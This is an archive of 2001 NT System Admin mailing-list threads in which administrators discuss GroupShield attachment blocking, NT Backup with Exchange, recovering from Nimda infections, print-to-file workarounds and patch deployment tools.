BOTH specific file extensions and file names in GroupShield? Looks like it's an either or configuration so for example, I can't block all .vbs and wtc.exe without blocking all .exe files. Thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NT Backup
Ohhh, haven't heard that before. Anyone using that now? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:12 PM To: NT System Admin Issues Subject: RE: NT Backup Doesn't installing Exchange Admin on the backup server make NT backup Exchange Aware Sorry... have always invested in BackupExec... Have even convinced 5 companies to throw away ArghServSH*T for BackupExec... -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 18:09 To: NT System Admin Issues Subject: RE: NT Backup Hey Rocky - I seem to recall that NT Backup will not backup Exchange stores while they are running. The last time I looked into this, I came up with the soln of stopping/ restarting the services for the backup. Unfortunately, as you aware, Exchange sometimes takes a bit of time and the backup would not get the info stores. Buying anything today? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Rocky Stefano [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 8:01 PM To: NT System Admin Issues Subject: NT Backup Quick. I've never had to use NT backup on W2K for a client before. Well finally have one cheap enough that doesn't want to spring for Veritas so my question is. When you use the backup wizard and it asks if you want to backup everything on the machine, does that include the IS for Exchange as well. I know if I do it manually I can choose the IS manually. Thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: mail loop
Thanks! Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Stu Sjouwerman [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:22 PM To: NT System Admin Issues Subject: RE: mail loop I already killed that one this afternoon about 4PM EST. Stu -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 5:27 PM To: NT System Admin Issues Subject: mail loop Stu - Will you please kill the Quick Question loop. I've gotten about 20 of them in the last 10 minutes. Thanks. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Exchange 5.5 and GroupShield
Ok Ill test the same. Great, there goes the early night. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dianne [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:53 PM To: NT System Admin Issues Subject: Re: Exchange 5.5 and GroupShield That's exactly what I did. I put info in both, tested and it didn't block. I'll try again tomorrow. - Original Message - From: Clark, Steve To: NT System Admin Issues Sent: Monday, September 24, 2001 9:25 PM Subject: RE: Exchange 5.5 and GroupShield Ok inside the Groupshield properties, click on the tab On-Access. At the bottom of the page is another button and 3 radio buttons. No blocking, All attachments and specified attachments. When you click on select, there are 3 more radio buttons. None, block extensions and block filenames. I put info in both block extensions and block filenames. According to the info from NAI, this now blocks extensions and filenames. Please let me know if you need any more help. Regards, Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dianne [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:21 PM To: NT System Admin Issues Subject: Re: Exchange 5.5 and GroupShield Version is 4.5.572.128 Engine 4.0.70 - Original Message - From: Clark, Steve To: NT System Admin Issues Sent: Monday, September 24, 2001 7:41 PM Subject: RE: Exchange 5.5 and GroupShield Groupshield 4.5 SP1 will allow you to block extensions as well as filenames. Are you using 4.5.1? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 6:58 PM To: NT System Admin Issues Subject: Exchange 5.5 and GroupShield Anyone know how to block BOTH specific file extensions and file names in GroupShield? Looks like it's an either or configuration so for example, I can't block all .vbs and wtc.exe without blocking all .exe files. Thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Exchange 5.5 and GroupShield
I just got the same results. If I choose to block attachments, then do the test it blocks the attachment. If I choose to block filenames, then do the test, it blocks the file. However, if I choose block the filename and send an email with an EXE, it goes right through. Todays word is SCRAMBLE. So, how much is Trend? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dianne [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:53 PM To: NT System Admin Issues Subject: Re: Exchange 5.5 and GroupShield That's exactly what I did. I put info in both, tested and it didn't block. I'll try again tomorrow. - Original Message - From: Clark, Steve To: NT System Admin Issues Sent: Monday, September 24, 2001 9:25 PM Subject: RE: Exchange 5.5 and GroupShield Ok inside the Groupshield properties, click on the tab On-Access. At the bottom of the page is another button and 3 radio buttons. No blocking, All attachments and specified attachments. When you click on select, there are 3 more radio buttons. None, block extensions and block filenames. I put info in both block extensions and block filenames. According to the info from NAI, this now blocks extensions and filenames. Please let me know if you need any more help. Regards, Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dianne [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:21 PM To: NT System Admin Issues Subject: Re: Exchange 5.5 and GroupShield Version is 4.5.572.128 Engine 4.0.70 - Original Message - From: Clark, Steve To: NT System Admin Issues Sent: Monday, September 24, 2001 7:41 PM Subject: RE: Exchange 5.5 and GroupShield Groupshield 4.5 SP1 will allow you to block extensions as well as filenames. Are you using 4.5.1? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 6:58 PM To: NT System Admin Issues Subject: Exchange 5.5 and GroupShield Anyone know how to block BOTH specific file extensions and file names in GroupShield? Looks like it's an either or configuration so for example, I can't block all .vbs and wtc.exe without blocking all .exe files. Thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Nimda and patch end up shutting my Web Server
Reformat. There is no way to 100% remove the virus from your system. You can download and run utilities from Eeye, Norton, NAI, Commandcenter .. But the bottom line, it's not going to be 100% cleaned. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Vani Murarka [mailto:[EMAIL PROTECTED]] Sent: Sunday, September 23, 2001 9:49 AM To: NT System Admin Issues Subject: Nimda and patch end up shutting my Web Server NT and IIS Gurus, please help. My system was infected by Nimda. Norton found certain TFTPxxx files under Inetpub/scripts which were infected. It could not clean it. It quarantined it. I deleted those files. But new TFTPxxx files kept getting created in that directory, and Norton kept saying those are infected with Nimda. I searched the internet to see what patch I must install. Following links from Symantec, this is the one I downloaded and installed - http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default .asp The patch was called Windows 4.0 Hotfix Ever since installing that, my Web Server does not run. Trying to run it from Internet Service Manager, says, The specified module could not be found. I am also not being unable to uninstall the patch from Control Panel - Add/Remove Programs as the page from where I downloaded it suggests, because it is not listed there. Maybe I selected the inappropriate patch - but now I am at a loss as to what to do next. Please give pointers. Thanks Vani http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Nimda and patch end up shutting my Web Server
Read the documentation from CERT, Eeye and other virus/ security authorities. If the virus was executed on your server, it will open ports and cause damage that can not be 100% removed. However, your statement If you had a properly installed Hosted system, you could determine what had been changed from a security standpoint. Sort of negates your other comment. If a system was properly hosted, it probably would have not been infected. Bottom line, there are too many people that have reported trying to remove using the tools that continue to be infected. It's just too much of a risk to continue using a box that has unknown damage in a production environment. My $.02. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Andrew S. Baker [mailto:[EMAIL PROTECTED]] Sent: Sunday, September 23, 2001 10:17 AM To: NT System Admin Issues Subject: RE: Nimda and patch end up shutting my Web Server Reformat. There is no way to 100% remove the virus from your system. I don't agree with that statement as an absolute, particularly if you avoided rebooting the machine while the virus was running. If you had a properly installed Hosted system, you could determine what had been changed from a security standpoint. Ultimately, rebuilding will be the safest way to resolve this issue for those systems which are constantly infected. == ASB - http://www.ultratech-llc.com/KB/?File=~MoreInfo.TXT == Feed a stranger's expired parking meter. -- H. Jackson Brown Jr. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Sunday, September 23, 2001 9:55 AM To: NT System Admin Issues Subject: RE: Nimda and patch end up shutting my Web Server Reformat. There is no way to 100% remove the virus from your system. You can download and run utilities from Eeye, Norton, NAI, Commandcenter .. But the bottom line, it's not going to be 100% cleaned. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Vani Murarka [mailto:[EMAIL PROTECTED]] Sent: Sunday, September 23, 2001 9:49 AM To: NT System Admin Issues Subject: Nimda and patch end up shutting my Web Server NT and IIS Gurus, please help. My system was infected by Nimda. Norton found certain TFTPxxx files under Inetpub/scripts which were infected. It could not clean it. It quarantined it. I deleted those files. But new TFTPxxx files kept getting created in that directory, and Norton kept saying those are infected with Nimda. I searched the internet to see what patch I must install. Following links from Symantec, this is the one I downloaded and installed - http://www.microsoft.com/ntserver/nts/downloads/critical/q269 862/default .asp The patch was called Windows 4.0 Hotfix Ever since installing that, my Web Server does not run. Trying to run it from Internet Service Manager, says, The specified module could not be found. I am also not being unable to uninstall the patch from Control Panel - Add/Remove Programs as the page from where I downloaded it suggests, because it is not listed there. Maybe I selected the inappropriate patch - but now I am at a loss as to what to do next. Please give pointers. Thanks Vani http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Looking for a discussion on IM
Hello, I have been asked to research and potentially implement IM for a company to communicate internally as well as externally. However, I have always heard that IM was evil and to close it down ASAP. I would like to hear real world implementation concerns/ tips as well as the security issues associated. Thanks in advance for your input. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: OT on Windows ME
Don't know much about ME other than it's a stripped out version of W2K. Can you look at the logs or do a Ctrl-Alt-Del and look at what's running when it slows. My focus is small shops - I realize money is very tight; however, you need to get rid of ME from the standpoint of your company trying to do anything network related down the road ME will not support. Good luck. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Saturday, September 22, 2001 2:08 AM To: NT System Admin Issues Subject: OT on Windows ME I have been a member of this list for about a month. We are a small company and I don't have the benefit of a large IT dept so I thought I'd throw this question to you guys. My personal PC is a Windows ME PC. Today it started doing something really weird. About every two hours it just kind of stops. I mean, it still works and all ( although there is no more Internet access) but it is very, very slow. Can't hardly move the mouse and I have to shutdown too get it back. It's weird because it goes south almost like clock work every 1.5 to 2 hours. I don't have a virus, I am fairly certain of that. It actually happens all of a sudden, yea, I sat here and waited for it to happen. It doesn't seem to be a gradual thing, I mean, it doesn't get progressively slow, it happens all at once all of a sudden. It is a royal PITA. Any ideas? : Thanks, John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Blue screen (ntoskrnl)
Nice - welcome to the new company! I've got a batch process to create ERD's automatically if you're interested. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Stephen Moreau [mailto:[EMAIL PROTECTED]] Sent: Saturday, September 22, 2001 6:46 PM To: NT System Admin Issues Subject: Re: Blue screen (ntoskrnl) Thanks for the info but I recently took over these servers (the admin before me quit) and he didn't maintain the erd. I tried the emergency repair process and told the process to look on the harddrives but it didn't work. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Blue screen (ntoskrnl)
http://support.microsoft.com/support/kb/articles/Q119/4/67.asp Also, I recall a utility from Dr Dos (I think) that would give you a free boot disk utility. Something to consider for future - the IDR from Veritas accompanied with a fll backup will restore a server from boot disk and tape drive. Excellent product and service. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Stephen Moreau [mailto:[EMAIL PROTECTED]] Sent: Saturday, September 22, 2001 7:18 PM To: NT System Admin Issues Subject: RE: Blue screen (ntoskrnl) Thanks, Steve, for the batch files. I'll give 'em a try. Anything to make things a little easier. Do you know how to make a bootable floppy for NT? I can restore the system files/registry from tape but I need a way to get into my dead system to replace the files. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: IEAK again
Use Update Expert. Load system agent on each PC Sit at your desk, point to the PC and tell it to load IE 5.5 SP2 and reboot at 9:30 PM Go home. Little simpler than download the IEAK. Get the customization code. Download the IE 5.5 components, customize the settings to the environment. Test, redo, test, test, test . Realize that the new overwrites everything from the old. Get pissed and do it anyway. Recreate settings manually. Been there, done that. This way is a lot easier. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Luke Brumbaugh [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 8:46 AM To: NT System Admin Issues Subject: IEAK again I have loaded IEAK and setup a configuration. I have loaded all the updates (sycronized) Setup a little web page the automatically downloads the program with instructions to open at current location etc. Now I am at the point of testing, I built a test box and goto that webpage. It loads and reboots, I check the build and not all the programs are loaded. Is there a file or something I need to edit?My major objective is to get all critical updates loaded, and loading all extras secondary. Luke L. Brumbaugh System Administrator, MCSE Ultryx Corporation Enterprise Channel Management Software for Manufacturers Visit us at http://www.ultryx.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Nimda and HTML Files
www.nai.com - look for the virus description and it tells you the lines added, Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Mark Kelsay [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 11:35 AM To: NT System Admin Issues Subject: Nimda and HTML Files I have read that nimda appends two lines of code to htm, html and asp files. Does anyone know what those two lines of code are or where I can find out? TIA, Mark Kelsay http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Is there any way to know for sure? More Nimda stuff.
What does the guest account look like? Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 2:40 PM To: NT System Admin Issues Subject: Is there any way to know for sure? More Nimda stuff. Maybe I am being paranoid. I have a server that the eeye scanner says is not vulnerable, I don't see any .eml files on it and when I scan for files changed since the 18th, there are no .exes. However, when I look at the task list, it shows 2 CMD.EXEs open. I have one open but not two. Am I being weird here? The second CMD.EXE un-nerves me, but I can't find any other sign of infection. Is there any one, sure fire way to KNOW that the box has been hit? Is there one registry entry or file or something that the virus ALWAYS does so I can see if the box is hit? I am thinking about re-building it, just in case, but if I can leave it up, I would obviously prefer that. Any ideas? JayW http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Is there any way to know for sure? More Nimda stuff.
Greatt. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Sullivan, Glenn [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 2:53 PM To: NT System Admin Issues Subject: RE: Is there any way to know for sure? More Nimda stuff. It looks like a little guys head, with Grey skin, black hair, and a light blue shirt, but so does everyone else's account... (sorry, I couldn't resist. And it's Friday...) Glenn Sullivan, MCSE+I MCDBA David Clark Company Inc. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 2:44 PM To: NT System Admin Issues Subject: RE: Is there any way to know for sure? More Nimda stuff. What does the guest account look like? Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 2:40 PM To: NT System Admin Issues Subject: Is there any way to know for sure? More Nimda stuff. Maybe I am being paranoid. I have a server that the eeye scanner says is not vulnerable, I don't see any .eml files on it and when I scan for files changed since the 18th, there are no .exes. However, when I look at the task list, it shows 2 CMD.EXEs open. I have one open but not two. Am I being weird here? The second CMD.EXE un-nerves me, but I can't find any other sign of infection. Is there any one, sure fire way to KNOW that the box has been hit? Is there one registry entry or file or something that the virus ALWAYS does so I can see if the box is hit? I am thinking about re-building it, just in case, but if I can leave it up, I would obviously prefer that. Any ideas? JayW http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: W2K Print to file
Couldn't you just map a fake printer to a file - it would then prompt the user for a location and a name for a bit more control. In other words, install a HP LJ II driver and send it to a file rather than a port. Is that what you're looking for? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:04 PM To: NT System Admin Issues Subject: W2K Print to file We have a 16bit legacy application that runs reports to dot matrix printers. We'd like to redirect this output to a file. In Windows2000, can I configure an LPT port to redirect to a file? I've seen previous utilities like Lpt2file and Redirect. Are these still my best options? Thank you in advance. William http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: W2K Print to file
Yeah but adobe is like $400. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Mier, Juan [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:29 PM To: NT System Admin Issues Subject: RE: W2K Print to file You could also install Adobe Acrobat and print to that. That will produce a PDF file that you can then print anywhere or just read with Reader. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 4:26 PM To: NT System Admin Issues Subject: RE: W2K Print to file Couldn't you just map a fake printer to a file - it would then prompt the user for a location and a name for a bit more control. In other words, install a HP LJ II driver and send it to a file rather than a port. Is that what you're looking for? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:04 PM To: NT System Admin Issues Subject: W2K Print to file We have a 16bit legacy application that runs reports to dot matrix printers. We'd like to redirect this output to a file. In Windows2000, can I configure an LPT port to redirect to a file? I've seen previous utilities like Lpt2file and Redirect. Are these still my best options? Thank you in advance. William http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: W2K Print to file
So do a net use to a bogus printer (will have to do the share on the server) and remap to the port. Reconnect using a batch file in the Run key of startup so you don't have to worry about someone removing by accident - lusers. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Joe L. Casale [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:33 PM To: NT System Admin Issues Subject: RE: W2K Print to file I am guessing no, cuz the dos program doesn't know windows printers, it knows hardware lpt's... I think you will have to use the acro idea, or one of your programs you mentioned. You could create the printer as you said, but then map another ltpx to that one, and see if that works... jlc -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 5:26 PM To: NT System Admin Issues Subject: RE: W2K Print to file Couldn't you just map a fake printer to a file - it would then prompt the user for a location and a name for a bit more control. In other words, install a HP LJ II driver and send it to a file rather than a port. Is that what you're looking for? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:04 PM To: NT System Admin Issues Subject: W2K Print to file We have a 16bit legacy application that runs reports to dot matrix printers. We'd like to redirect this output to a file. In Windows2000, can I configure an LPT port to redirect to a file? I've seen previous utilities like Lpt2file and Redirect. Are these still my best options? Thank you in advance. William http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: W2K Print to file
More centralized - more complicated? It can be pushed across a network as opposed to running to each wkst and mapping the drive. I don't know about you but 90% of the time I've mapped through the GUI, it fails on reboot regardless of the settings. Forcing through batch seems to work each time. Regardless of the method, we both arrive at the same solution - I've been on the end of touching each one and it gets old. My $.02. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Joe L. Casale [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:39 PM To: NT System Admin Issues Subject: RE: W2K Print to file Isn't that essentially more complicated way of doing what I said? You can share the File printer on your own wkst, then map an lptx to it on your wkst... jlc -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 5:36 PM To: NT System Admin Issues Subject: RE: W2K Print to file So do a net use to a bogus printer (will have to do the share on the server) and remap to the port. Reconnect using a batch file in the Run key of startup so you don't have to worry about someone removing by accident - lusers. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Joe L. Casale [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:33 PM To: NT System Admin Issues Subject: RE: W2K Print to file I am guessing no, cuz the dos program doesn't know windows printers, it knows hardware lpt's... I think you will have to use the acro idea, or one of your programs you mentioned. You could create the printer as you said, but then map another ltpx to that one, and see if that works... jlc -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 5:26 PM To: NT System Admin Issues Subject: RE: W2K Print to file Couldn't you just map a fake printer to a file - it would then prompt the user for a location and a name for a bit more control. In other words, install a HP LJ II driver and send it to a file rather than a port. Is that what you're looking for? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:04 PM To: NT System Admin Issues Subject: W2K Print to file We have a 16bit legacy application that runs reports to dot matrix printers. We'd like to redirect this output to a file. In Windows2000, can I configure an LPT port to redirect to a file? I've seen previous utilities like Lpt2file and Redirect. Are these still my best options? Thank you in advance. William http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: W2K Print to file
Agreed - it works very well. I contacted a sales person recently regarding PDF sales crap. She said - I'll turn that into our marketing people. I ran the company's white paper through the distiller and sent it to her in email. I love turning the complicated into simplicity and spinning the sales people. Some days, I love this stuff. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:40 PM To: NT System Admin Issues Subject: RE: W2K Print to file But it is the perfect solution -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 4:31 PM To: NT System Admin Issues Subject: RE: W2K Print to file Yeah but adobe is like $400. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Mier, Juan [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:29 PM To: NT System Admin Issues Subject: RE: W2K Print to file You could also install Adobe Acrobat and print to that. That will produce a PDF file that you can then print anywhere or just read with Reader. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 4:26 PM To: NT System Admin Issues Subject: RE: W2K Print to file Couldn't you just map a fake printer to a file - it would then prompt the user for a location and a name for a bit more control. In other words, install a HP LJ II driver and send it to a file rather than a port. Is that what you're looking for? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:04 PM To: NT System Admin Issues Subject: W2K Print to file We have a 16bit legacy application that runs reports to dot matrix printers. We'd like to redirect this output to a file. In Windows2000, can I configure an LPT port to redirect to a file? I've seen previous utilities like Lpt2file and Redirect. Are these still my best options? Thank you in advance. William http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WARNING: Hacker Alert
It's called St Bernard Software UpDate Expert. There is an agent that runs on servers as well as workstations. The agent will query Db for updates and actually download them for you. If you like the centralized approach, you can run a console and tell what servers/ workstations get what updates. It's very cool. Please let me know if you have any more questions or would like pricing. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Bob's Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 1:29 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert Importance: High This is a real can of super ugly worms and you need a total security policy for your site not just blocking executables via email. Tell me about it. I have 13 servers here, 3 of them *nix. All of them survived except one which got hit, because it had a trust relationship with a web designer's home machine and he got hit. Keeping all these machines up to date is a royal pain in the ass - since Microsloth haven't seen fit to include the hotfixes in their 'windowsupdate' site for NT4 yet. I remember seeing a URL somewhere of a useful gadget for telling you which servers had which patches, and which servers needed which patches but now that I need it, I'll be damned if I can find it... :( Anyone out there with a better memory? Regards Bob http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Server Monitoring Software
